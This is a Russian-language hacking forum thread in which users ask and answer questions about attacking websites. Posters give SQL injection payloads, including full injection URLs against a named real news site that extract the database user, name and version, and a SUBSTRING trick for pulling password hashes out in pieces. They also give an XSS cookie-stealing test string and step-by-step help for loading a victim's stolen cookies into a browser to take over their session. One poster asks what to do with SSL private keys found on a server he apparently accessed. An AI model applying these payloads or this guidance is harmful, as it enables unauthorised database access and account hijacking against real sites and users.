Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    сокращать сам запрос, все двойные числа заменить на одинарные, ну т.е.

    union+select+1,2,3,4,5,6,7,8,9,10,11,12,13

    заменить на

    union+select+1,2,3,4,5,6,7,8,9,0,1,2,3

    для начала. Даже на этом пример съекономилось 4 символа
     
  2. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    мы тут про вывод ;) :D
     
  3. Seshh

    Seshh New Member

    Joined:
    4 Mar 2009
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    Вопрос: Если XSS был найден посредством подставления вот этого скрипта: "><script>alert(document.cookie)</script>
    [​IMG]
    то дальнейшие мои действия для изъятия куки у жертвы такиеже, как и в случае еслибы я уязвимость нашол вот этим скриптом: "><script>alert(XSS)</script> ???
     
  4. TreV@N

    TreV@N Elder - Старейшина

    Joined:
    14 Jul 2008
    Messages:
    135
    Likes Received:
    48
    Reputations:
    19
    Да.Такие-же действия.
     
  5. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Gorev
    Не вполне понял вопрос.

    Если скрипт обрезает выводимые данные, допустим до 15 символов, то , как тут уже сказали, SUBSTRING. Выглядеть это будет примерно так(для хеша 32):

    1-е 15 символов
    union select SUBSTRING(passwd, 0, 15) from user
    c 15 по 30
    SUBSTRING(passwd, 15, 30)
    и остальные 2
    SUBSTRING(passwd, 30, 32)

    ========================

    Иногда встречается "наложение" вывода, ну например сдесь:
    http://presscenter.kz/index.php?show=news&id=-1+union+select+concat_ws(0x3a,User(),Database(),Version()),2,3,4,5,6,7,8,9/*
    Вот так нам не видно юзера

    http://presscenter.kz/index.php?show=news&id=-1+union+select+concat_ws(0x3a,0x6C6F6C6F6C6F,User(),Database(),Version()),2,3,4,5,6,7,8,9/*
    А вот так видно всё

    ========================

    Если на вопрос не ответил, поподробнее опиши проблему, что выводится, что не выводится, при каких условиях, и чем тебя SUBSTRING не устраивает
     
    1 person likes this.
  6. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Ну,эт понятно... А почему не работает уязвимость в моей бд,непонятно.Вроде всё правильно делаю.
     
  7. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    а ты в phpmyadminе залогинен?
     
  8. joomler

    joomler Member

    Joined:
    19 Feb 2009
    Messages:
    25
    Likes Received:
    5
    Reputations:
    3
    Привет всем :) Ребят подскажите вот что:
    Есть купи с другого компа, как их использовать?
     
  9. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    В браузере вставляешь вместо своих куков на даном сайте и заходиш на него с сесией того, у кого ты их умыкнул...
     
  10. joomler

    joomler Member

    Joined:
    19 Feb 2009
    Messages:
    25
    Likes Received:
    5
    Reputations:
    3
    а куда их вставлять? в строку броузера?
     
    1 person likes this.
  11. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    не встроку а в место где куки опера -->tools-->preferences-->advanced-->coockies-->manage coockies
     
  12. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Неет!
    В опере:
    Инструменты->настройки->дополнительно->cookie->управление cookie
     
    2 people like this.
  13. joomler

    joomler Member

    Joined:
    19 Feb 2009
    Messages:
    25
    Likes Received:
    5
    Reputations:
    3
    понятно а в эксплолере?
     
  14. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    %USERPROFILE%\Cookies
     
  15. joomler

    joomler Member

    Joined:
    19 Feb 2009
    Messages:
    25
    Likes Received:
    5
    Reputations:
    3
    а где это в эксплолере искать? по подробней если можно :)
     
  16. joomler

    joomler Member

    Joined:
    19 Feb 2009
    Messages:
    25
    Likes Received:
    5
    Reputations:
    3
    посмотрел ссылку почитал сделал как показанно но произошла ошибка((( не импортируется ни чего
     
  17. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    искать не надо ничего - открой проводник, вбей в адресную строку %USERPROFILE%\Cookies и туда скопируй файлы куков своих
     
    1 person likes this.
  18. joomler

    joomler Member

    Joined:
    19 Feb 2009
    Messages:
    25
    Likes Received:
    5
    Reputations:
    3
    Версия 7
    попугай нашел куда вставлять куки , а как пароли от сайтов узнать пробовал заходить на сайт с установленной кукой другого компа и ни чего не произошло.. Подскажите ?
     
  19. joomler

    joomler Member

    Joined:
    19 Feb 2009
    Messages:
    25
    Likes Received:
    5
    Reputations:
    3
    ааа то есть не покаждой куке можно узнать , а есть ли программы может в которую забиваешь куку и она выдает пароль?
     
  20. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Пипл,нашёл папку на машине:

    /usr/local/apache/etc/ssl.all

    Там сертификационные файлы server.crt,server.key,mail.crt,mail.key,webmail.crt,webmail.key... Чё с инми делать не пойму.Ключи там под RSA и приватные к тому же.С SSH-то понятно,а вот с SSL ещё дел не имел ).Мб кто подскажет,что надо делать,какие проги нужны ?
     
Thread Status:
Not open for further replies.